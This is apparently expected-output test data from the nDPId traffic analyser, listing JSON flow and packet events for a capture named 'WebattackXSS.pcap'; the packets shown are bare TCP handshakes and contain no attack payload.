+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1499347053736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz4b8rqheD0F2M6AScSAXEAAAAgQFtAQCCAoD4w1rATk79AEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1499347053736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347053736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TcdAAD4GeBGsEAABwKgKMs+GAFAPQXYz\/K6oX4AQAOW2FgAAAQEICgE5O\/UD4w1r"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347056332,"flow_last_seen":1499347056332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347056332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1499347056332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMxAAD4GrQSsEAABwKgKMs+gAFAIRCayAAAAAKACchAgZgAAAgQFtAQCCAoBOT5+AAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1499347056333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz6DSyc0OCEQms6AScSBtlQAAAgQFtAQCCAoD4w\/0ATk+fgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1499347056333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347056333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GM1AAD4GrQusEAABwKgKMs+gAFAIRCaz0snND4AQAOUMnQAAAQEICgE5Pn4D4w\/0"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347057628,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347057628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yDFAAD4G\/Z6sEAABwKgKMs+uAFAuuffwAAAAAKACchAnYQAAAgQFtAQCCAoBOT\/BAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz662huYkLrn38aAScSB2eQAAAgQFtAQCCAoD4xE4ATk\/wQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yDJAAD4G\/aWsEAABwKgKMs+uAFAuuffxtobmJYAQAOUVgAAAAQEICgE5P8ID4xE4"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347060176,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347060176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TeFAAD4Gd++sEAABwKgKMs\/IAFAgqg\/fAAAAAKACchAa6wAAAgQFtAQCCAoBOUI+AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz8g7I8+hIKoP4KAScSD5bAAAAgQFtAQCCAoD4xO1ATlCPgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1499347060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347060177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TeJAAD4Gd\/asEAABwKgKMs\/IAFAgqg\/gOyPPooAQAOWYcwAAAQEICgE5Qj8D4xO1"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347061452,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347061452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMs\/WAFCNxbSIAAAAAKACchAH2QAAAgQFtAQCCAoBOUN9AAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz9aoZTRrjcW0iaAScSATEAAAAgQFtAQCCAoD4xT0ATlDfQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMs\/WAFCNxbSJqGU0bIAQAOWyFgAAAQEICgE5Q34D4xT0"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347062740,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347062740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9NAAD4GxfysEAABwKgKMs\/kAFBs1rtsAAAAAKACchAglAAAAgQFtAQCCAoBOUS\/AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz+TKmKvobNa7baAScSCQ2AAAAgQFtAQCCAoD4xY2ATlEvwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1499347062741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347062741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/9RAAD4GxgOsEAABwKgKMs\/kAFBs1rttypir6YAQAOUv3wAAAQEICgE5RMAD4xY2"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347065288,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347065288,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t0lAAD4GDoesEAABwKgKMs\/+AFBdePB1AAAAAKACchD4UQAAAgQFtAQCCAoBOUc8AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz\/602CZHXXjwdqAScSABewAAAgQFtAQCCAoD4xizATlHPAEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t0pAAD4GDo6sEAABwKgKMs\/+AFBdePB2tNgmSIAQAOWggQAAAQEICgE5Rz0D4xiz"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347066560,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347066560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347069146,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347069146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xkJAAD4G\/42sEAABwKgKMtAmAFBk4I1DAAAAAKACchBQLwAAAgQFtAQCCAoBOUsBAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0CYp21tPZOCNRKAScSCriAAAAgQFtAQCCAoD4xx4ATlLAQEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1499347069147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347069147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xkNAAD4G\/5SsEAABwKgKMtAmAFBk4I1EKdtbUIAQAOVKkAAAAQEICgE5SwED4xx4"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347070422,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347070422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83flAAD4G59asEAABwKgKMtA0AFCnyZG5AAAAAKACchAHgwAAAgQFtAQCCAoBOUxAAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0DQuPoKZp8mRuqAScSA18AAAAgQFtAQCCAoD4x23ATlMQAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1499347070423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347070423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03fpAAD4G592sEAABwKgKMtA0AFCnyZG6Lj6CmoAQAOXU9wAAAQEICgE5TEAD4x23"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347071685,"flow_last_seen":1499347071685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347071685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
